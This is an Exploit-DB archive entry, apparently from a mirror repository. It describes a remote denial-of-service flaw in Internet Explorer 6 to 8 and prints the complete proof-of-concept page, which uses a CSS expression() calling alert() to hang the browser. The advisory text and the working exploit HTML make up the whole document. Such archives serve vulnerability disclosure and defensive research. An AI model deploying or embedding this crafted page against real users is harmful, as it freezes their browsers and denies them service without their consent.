exploit-db-mirror/exploits/windows/dos/34069.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
593 B
HTML

source: https://www.securityfocus.com/bid/40487/info
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage.
Successfully exploiting this issue will cause the application to stop responding, denying service to legitimate users.
Internet Explorer 6, 7, and 8 are vulnerable.
<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html>